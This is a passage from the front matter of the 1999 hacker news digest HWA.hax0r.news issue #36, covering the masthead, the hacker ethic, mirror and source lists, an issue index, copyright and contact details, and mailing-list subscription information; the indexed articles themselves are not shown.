[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                     <=-[ HWA.hax0r.news ]-=>                            =
==========================================================================
[=HWA'99=] Number 36 Volume 1 1999 Oct 3rd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...

marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de

"your enemy is never a villain in his own eyes, keep this in mind, it may
offer a way to make him your friend if not you can kill him without hate,
and quickly."

- Unknown (From the Sam Spade port scanner tips dialog for windows 9x)
  http://www.blighty.com/products/spade/

http://welcome.to/HWA.hax0r.news/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've
endeavoured to format all text to 80 cols except for articles, site
statements and urls, which are posted verbatim. I've decided to continue
with this method unless more people complain. The zine is best viewed in
1024x768 mode with UEDIT....

- Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html.
** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use out
of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN, nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info. It's a labour
of love and will be continued for as long as I feel like it. I'm not
motivated by dollars or the illusion of fame; did you ever notice how
the most famous/infamous hackers are the ones that get caught? There's
a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #36
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #36
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. The Real ReDATtAck poised to Attack Belgium?.....................
04.0 .. FAQ and Guide to Cracking by Mixter..............................
05.0 .. DOD Launches Computer Crime Lab .................................
06.0 .. IBM to Launch Security Chip .....................................
07.0 .. Law Firm Sued Over Possible Cyber Attack ........................
08.0 .. Danish Man Sentenced for Intrusion Attempt ......................
09.0 .. DOE to Spend $80mil on Info Security ............................
10.0 .. The Army Wants to Eliminate Passwords ...........................
11.0 .. MediaPlayer and RealPlayer send GUID's to internet sites.........
12.0 .. GTE accidentally sends unlisted numbers to telemarketers ........
13.0 .. ``Relationship Marketing?'' We have to talk......................
14.0 .. News and views from SLa5H........................................
15.0 .. Forbidden Knowledge #7 is being released.........................
16.0 .. The 'real' story behind JP and PSS as per Forbes magazine........
17.0 .. ActiveX Buffer Overruns Advisory.................................
18.0 .. CyberArmy: Wingates list.........................................
19.0 .. Internet Vigilantism A story so fantastic it just might be true..
20.0 .. Forbes calls AntiOnline's bluff..................................
21.0 .. BO2K, good or evil? The Debate Continues. .......................
22.0 .. 97bit ECC Stronger than 512bit RSA ..............................
23.0 .. DOE Loses Dough to Budget Cut....................................
24.0 .. California Proposes Email Eavesdropping Law .....................
25.0 .. Singaporean Boy Sentenced to 12 Months ..........................
26.0 .. CIA Funds Startup VC Firm .......................................
27.0 .. BO2K, NetBus, and now WinWhatWhere ..............................
28.0 .. Microsoft, Insecure or Just More Prevalent? .....................
29.0 .. Darktide Hacking Is Closed ......................................
30.0 .. NIPC Head Warns of Y2K Bug Fixes ................................
31.0 .. Better Computer Security Needs More Than Just Laws ..............
32.0 .. New NT Security List Started ....................................
33.0 .. Computer Security Dictionary Released ...........................
34.0 .. CyberWarfare - Real or Imagined? ................................
35.0 .. Theo de Raadt and OpenBSD Profiled ..............................
36.0 .. SPAM HOUSE.......................................................
37.0 .. NET-SECURITY SITE INFO...........................................
38.0 .. PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT........................
39.0 .. DUTCH "CYBERCOPS" PATROLLING THE NET.............................
40.0 .. BIKE WEB SITE HACKS ITSELF.......................................
41.0 .. ARMY STUDYING IT RECRUITMENT.....................................
42.0 .. TRUSTE OK'S HOTMAIL FIXES........................................
43.0 .. SECURE DSL TECHNOLOGY............................................
44.0 .. HACK, COUNTERHACK................................................
45.0 .. NO SAFETY IN NUMBERS.............................................
46.0 .. YAHOO! MESSENGER DoS.............................................
47.0 .. PROBLEM IN MCF40.DLL.............................................
48.0 .. US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS....................
49.0 .. DIGITALBOND ON SSL...............................................
50.0 .. THE FUTURE OF AV COMPANIES.......................................
51.0 .. UNPLUGGING THE "PHONEMASTERS"....................................
52.0 .. INDIA RESPONDS TO Y2K ACCUSATIONS................................
53.0 .. ANOTHER IE 5.0 HOLE EXPOSED......................................
54.0 .. TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE................
55.0 .. FED COMPUTER SECURITY BILL HAS STRONG SUPPORT....................
56.0 .. JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN.......................
57.0 .. COURT TO REVISIT CRYPTO RULING...................................
58.0 .. DRAM ROBBERIES...................................................
59.0 .. DON'T BLAME BO FOR SECURITY PROBLEMS.............................
60.0 .. WHY HACKING CONTESTS ARE A BAD IDEA..............................
61.0 .. NO $35 MILLION FOR DOE CYBER SECURITY............................
62.0 .. DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING............
63.0 .. HATE ON GOVERNMENT WEB SITE......................................
64.0 .. MS: JUST KEEP ON PATCHING........................................

=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return thats tres cool, if not we'll consider ur ad anyways so
        send it in. ads for other zines are ok too btw just mention us
        in yours, please remember to include links and an email contact.
        Corporate ads will be considered also and if your company wishes
        to donate to or participate in the upcoming Canc0n99 event send
        in your suggestions and ads now...n.b date and time may be pushed
        back join mailing list for up to date information.................
        Current dates: POSTPONED til further notice, place: TBA.. .........

Ha.Ha .. Humour and puzzles ............................................
         Hey You!........................................................
         =------=........................................................
         Send in humour for this section! I need a laugh and its hard to
         find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................

H.W .. Hacked Websites ...............................................

A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHERS RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada
/ North America (hell even if you are inside ..)
and wish to send printed matter like newspaper clippings a subscription to
your cool foreign hacking zine or photos, small non-explosive packages or
sensitive information etc etc well, now you can. (w00t)

please no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool dude
/ gal and send a poor guy a postcard preferably one that has some scenery
from your place of residence for my collection, I collect stamps too so
you kill two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in Bahrain, take
it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by
  you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
  compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
  fun or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for: Good news sites that are not already listed here OR on the
HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium
outside the distribution of this list may be challenged by you, the
author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below. Other than the
change of domains nothing of how the list is run changes. I am still the
moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives
go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options will be
moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit
of BUGTRAQ where non-English speaking people or people that don't feel
comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ
will continue to be the place to submit vulnerability information, but if
you feel more comfortable using some other language you can give the
other lists a try. All relevant information from the other lists which
have not already been covered here will be translated and forwarded on by
the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will
be moderated by CORE SDI S.A. from Argentina (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If you
are interested in viewing the staff pages, please see the 'About' section
on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing
lists we hope you will find useful. A number of them are not scheduled to
start for several weeks but starting today the following list is
available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion
  of new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of wide spread
  cases (Melissa, ADM worm, etc). The other choice people are usually
  left with is email CERT but this fails to communicate this important
  information to others that may be potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information.
  Topical items include such things as information about rootkits, new
  trojan horses and viruses, source of attacks and tell-tale signs of
  intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with
ten other forums over the next two months. These forums will be built and
moderated by people in the community as well as vendors who are willing
to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities.
  We are making accessible a free vulnerability database. You can search
  it by vendor, product and keyword. You will find detailed information
  on the vulnerability and how to fix it, as well as links to reference
  information such as email messages, advisories and web pages. You can
  search by vendor, product and keywords. The database itself is the
  result of culling through 5 years of BUGTRAQ plus countless other lists
  and news groups. It's a shining example of how thorough full disclosure
  has made a significant impact on the industry over the last half decade.

* Products.
  An incredible number of categorized security products from over two
  hundred different vendors.

* Services.
  A large and focused directory of security services offered by vendors.

* Books, Papers and Articles.
  A vast number of categorized security related books, papers and
  articles. Available to download directly from our servers when
  possible.

* Tools.
  A large array of free security tools. Categorized and available for
  download.

* News:
  A vast number of security news articles going all the way back to 1995.

* Security Resources:
  A directory to other security resources on the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only
information you may be interested in. You can filter by categories,
keywords and operating systems, as well as configure how much data to
display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful.
I invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are
available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an
inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already, also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
